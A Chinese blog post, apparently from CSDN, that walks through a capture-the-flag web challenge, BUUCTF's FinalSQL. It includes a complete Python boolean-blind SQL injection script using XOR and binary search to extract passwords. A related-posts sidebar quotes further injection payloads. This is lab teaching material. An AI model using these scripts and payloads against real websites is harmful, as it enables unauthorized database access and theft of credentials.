[极客大挑战 2019]FinalSQL 1

最新推荐文章于 2022-10-21 15:15:15 发布
最新推荐文章于 2022-10-21 15:15:15 发布
阅读量1.8k 收藏 5
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/124507674
版权

[极客大挑战 2019]FinalSQL 1

首先打开题目,发现是一个sql注入:

在这里插入图片描述

寻找注入点发现注入点在:
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

发现是一个盲注,且过滤了and和空格等

并且直接盲注比较慢,还需要利用二分法来编写脚本

大佬脚本:

import requests


url = "http://b4d7330a-4880-41c4-a20c-3dae55d11c37.node4.buuoj.cn:81/search.php"
flag = ''

def payload(i, j):
    sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print (r.url)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)

获取flag:

在这里插入图片描述参考博客:

https://blog.csdn.net/qq_37589805/article/details/116525525

南冥~
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-[极客挑战 2019]FinalSQL
weixin_44016181的博客
09-15 295
除了普通的注入流程,报错注入,时间注入外,这题涉及了布尔注入当中的异或注入,根据回显的状态信息来获取数据库的相关信息。这样即便是我们不能直接调用和查看数据库,也能通过这种特别的注入方式得到flag。
[极客挑战 2019]FinalSQL ---不会编程的崽
最新发布
不会编程的崽的博客
03-16 627
sql盲注
[极客挑战 2019]FinalSQL
qq_43801002的博客
08-02 1663
题目 过程 1.提示盲注,找注入口,fuzz看过滤情况,使用bp自带的字典即可。 2.’^‘没有被过滤,输入1^1回显’ERROR’,1^0回显’NO! Not this! Click others~~~’,判断出为数字型注入 由于空格被过滤,用()代替。 1^(ord(substr((select(group_concat(schema_name))from(information_schema.schema ta)),%d,1))=%d)^1"%(i,ord(j)) 获取数据库名称 1^(ord
[极客挑战 2019]FinalSQL1
azraelxuemo的博客
07-21 254
具体的思路网上也还有其他的,这里我就分享一个脚本 这个是爆数据名,表名,列名类推 import requests import time database_all = '' url = 'http://7023b2d9-28ff-48a1-b167-05f060adfc6e.node4.buuoj.cn/search.php?id=1' # 求出总长度的位数,比如说如果总长度为43,那么就是2位数 weishu = '' for i in range(1, 7): sql = "^(subst
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
ISCC2019个人挑战赛题目练习
05-05
为了让大家能够拿到题目练习,增强网络安全技术和大赛经验的积累,可以下载这些题目来练习。解题思路在我的博客。
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
[极客挑战 2019]FinalSQL1 wp
m0_55185160的博客
08-06 218
我们打开网页,用admin和'1去试 结果给我们返回的报错为 于是我再次输入admin ,passward进行登录结果报错还是一样, 之后把admin改* 结果报错信息还是一,样, 又因为本题为fianlSQL,可能存在盲注。 于是借助了大佬的脚本, import requests url = 'http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php' flag = '' for i in range(1,250)
buuoj [极客挑战 2019]FinalSQL
pondzhang的专栏
04-02 508
import requests #database length def get_database_length(): count = 0 while(1): url = "http://5a0d5a51-9667-4813-b173-b276246a28bc.node3.buuoj.cn/search.php?id=1^1^(length(database()...
BUUCTF [极客挑战 2019]FinalSQL
qq_60829702的博客
10-21 1273
因为之前的几道盲注题目我都是直接看师傅的wp拿来用的,现在自己写一下发现果然光看不如去写。只有自己真正的去写了脚本才会发现一些东西永远都是看起来简单的一批,但是真正的让自己独立写出来还是有点难度的。毕竟那是别人的东西不是自己的东西,我们要把其他师傅的知识变成我们自己的。本人菜鸟一枚,虽然花了挺多时间写这个题目和wp的,但是收获到了很多东西,也希望我能坚持下来。
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解能力。 参赛者需要根据题目要求,在给定的表中使用合适的 SQL 查询语句,筛选出满足条件的数据,并将查询结果返回。 注意:LoveSQL 1是极客挑战2019中的一个具体题目,与其他题目无关。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值